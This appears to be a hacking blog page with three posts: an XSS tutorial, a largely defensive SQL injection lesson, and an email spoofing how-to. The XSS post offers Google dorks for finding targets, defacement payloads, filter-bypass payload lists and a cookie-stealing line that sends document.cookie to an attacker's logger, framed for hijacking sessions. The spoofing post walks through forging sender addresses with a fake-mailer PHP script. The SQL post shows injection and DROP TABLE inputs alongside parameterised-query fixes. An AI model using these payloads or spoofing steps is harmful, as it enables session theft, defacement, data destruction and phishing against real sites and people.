Honhar Engineer

Honhar Engineer
Thanks for visiting,stay connected for more updates !

Sunday, February 23, 2014

Cross-site Scripting XSS Attacks

'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability 
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.
This technique is also used for website Hacking.


Types of XSS: 
There are actually three types of Cross-Site Scripting, commonly named as:

  1. DOM-Based XSS
  2. Non-persistent XSS
  3. Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
 - The attacker creates a well builded malicious website
 - The ingenuous user opens that site
 - The user has a vulnerable page on his machine
 - The attacker's website sends commands to the vulnerable HTML page
 - The vulnerable local page execute that commands with the user's privileges
  on that machine.
 - The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website 
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn't need to
 provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses 
that kind of tool to leave messages to the owned 
of the website and at a first look it doesn't seems something dangerous, but if an 
attacker discover that the system is vulnerable can insert some malicious code in his
 message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any 
check on the content of the inserted message: it just inserts the data provided from 
the user into the result page.


How to Find XSS Vulnerabilities:-


To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good 
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS:
Well now lets start learning some Actual Methods, the most common used XSS 
injection is :

<script>alert("Priyanshu")</script>

now this will alert a popup message, saying "Priyanshu" without quotes.

So,use "search.php?q=" and you can simple try the following on a website with the
 same thing,

http://website.com/search.php?q=<script>alert("Priyanshu")</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Priyanshu</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

Example:


How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface 
methods, there are many ways for defacing i will mention some of the best and most used, 
the first one being IMG SCR, now for those of you who dont know html, IMG SCR 
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything 
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to 
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf" 

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>

There are many others ways that you can found using Google or other website. 
Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make 
cookie logger from here: 

How To Make A Cookie Stealer Php script ? 

ok now you have it save it has a .php file and upload to your server, remember to 
create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do. 
ok now your gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


How to Bypass Filtration ?

Alot of sites may seem vulnerable but not executing the code, well to solve this read 
this. Some common methods to bypass filtration is

')alert('xss');
or
");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server. 
You can also try hexing or base64 encoding your data before you submit, Please note
 its bad practice to use alert("XSS") to test for XSS, because some sites block the 
keyword "XSS" before so we using "Priyanshu".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('Priyanshu')</script>
website.com/search.php?q="><script>alert("Priyanshu")</script>
website.com/search.php?q="><script>alert("Priyanshu");</script>
website.com/search.php?q="><script>alert(/Priyanshu");</script>
website.com/search.php?q=//"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz<script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"><script>alert(/Priyanshu/);</script>
website.com/search.php?q=xyz"></script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=000"><script></script><script>alert(Priyanshu);</script>
website.com/search.php?q=000xyz</script><script>alert(/Priyanshu/);</script>
website.com/search.php?q=--<script>"></script>alert(/Priyanshu/);</script>
website.com/search.php?q="><img src='javascript:alert('Priyanshu');'>
website.com/search.php?q="><script src='http://virus.js'</script>


Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many 
sites where 'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here 

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC". 
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

SQL Injection Attack

An SQL Injection can destroy your database.

SQL in Web Pages

In the previous chapters, you have learned to retrieve (and update) database data, using SQL.
When SQL is used to display data on a web page, it is common to let web users input their own search values.
Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data:

Server Code

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page.
The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statements, via web page input.
Injected SQL commands can alter SQL statement and compromises the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time.
Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id.
If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
UserId:

Server Result

SELECT * FROM Users WHERE UserId = 105 or 1=1
The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true.
Does the example above seem dangerous? What if the Users table contains names and passwords?
The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:

Server Code

uName = getRequestString("UserName");
uPass = getRequestString("UserPass");

sql = "SELECT * FROM Users WHERE Name ='" + uName + "' AND Pass ='" + uPass + "'"
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box.
The code at the server will create a valid SQL statement like this:

Result

SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL

Most databases support batched SQL statement, separated by semicolon.

Example

SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Customers table, and then delete the table called Suppliers.
If we had the following server code:

Server Code

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id:
The code at the server would create a valid SQL statement like this:

Result

SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers


Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks.
This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input.
(In fact it should be perfectly legal to input an SQL statement in a database field.)
The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters.
SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.

ASP.NET Razor Example

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = @0";
db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker.
The SQL engine checks each parameter to ensure that it is the correct for its column, and are treated literally, and not as part of the SQL to be executed.

Another Example

txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
db.Execute(txtSQL,txtNam,txtAdd,txtCit);

NoteYou have just learned to avoid SQL injection. One of the top website vulnerabilities.


Examples

The following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId");
sql = "SELECT * FROM Customers WHERE CustomerId = @0";
command = new SqlCommand(sql);
command.Parameters.AddWithValue("@0",txtUserID);
command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
command = new SqlCommand(txtSQL);
command.Parameters.AddWithValue("@0",txtNam);
command.Parameters.AddWithValue("@1",txtAdd);
command.Parameters.AddWithValue("@2",txtCit);
command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City)
VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':val', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();

Wednesday, February 19, 2014

E-mail Spoofing: Anonymous Mail Through php

        email
Hi friends! Few weeks back I have got few mails asking me to write on tracing anonymous mails. So I thought today to get started with the topic of anonymous mailing. Before you learn to trace an email you must know to create an anonymous mail. Using this technique you can email any user from any email service you wish. You don’t even need the access to the email id from which you want the email to be sent. Today I am gonna introduced to a website service and will give you a basic idea on how it works!
After reading this article you will be able to send an email from any email address. This is also known as Email Spoofing. This can be cone in many methods, in this post I will describe to do it with a fake mailer php script.
Note: If you send an email from an id of a particular server to the id that corresponds to the same server then your email may alert the user! That is, if you mail from a Gmail id to another Gmail id using fake mailer script then there would be a warning message that would be displayed at the bottom of the email.
So let’s start the email spoofing…!
  1. Go to http://emkei.cz
  2. Fill the From NameFrom Email and To fields.
  3. Write the message in the Text field.
  4. Enter the CAPTCHA and click Send!
  5. Agree the T&C and your mail is sent!
So what is happening here?
This webpage contains a PHP code similar to the one which is given below. This script generates an email that is to be sent with the provided from email address and then it confirms whether the mail is successfully sent or not.
echo” Enter the ’To’ email address:”;
$to = $_GET[email];
echo”Enter the ‘Subject’ of email”;
$subject = $_GET[header];
echo”Enter the ‘From’ email address:”;
$fake = $_GET[from];
echo”Enter the ‘Message’”;
$message = $_GET[message];
}
$headers = “MIME-Version: 1.0″ . “\r\n”;
$headers .= “Content-type:text/html;charset=iso-8859-1″ . “\r\n”;
$headers .= “From: ” . $fake . ” <” . $fake . “>” . “\r\n”;
if (mail($to, $subject, $message, $headers))
{
echo”The e-mail was successfully sent to ” . $to . “
\n”;
echo”From: ” . $fake . “
\n”;
echo”Subject: ” . $subject . “
\n”;
echo”Message:
\n”;
echo”” . $message . “
“;
}
else
{
echo”Opps there was a problem sending the email\n”;
}
?>
To get this script into action you will have to host this PHP script at a web hosting server. Then you have to make a webpage using HTML and in the form of action=fakemailer.php has to be written. The fakemailer.php is the name of the hosted PHP file with the above code.
Remember, the email which is sent will be associated with an IP address of the web server where you hosted your PHP script. Therefore this makes the fake make traceable!
A detailed description on creating such kind of webpages and tracing the anonymous mails will be provided in my upcoming articles.
Till then have fun experimenting with fake mailing!
Feel free to comment below… Your response is most precious to us!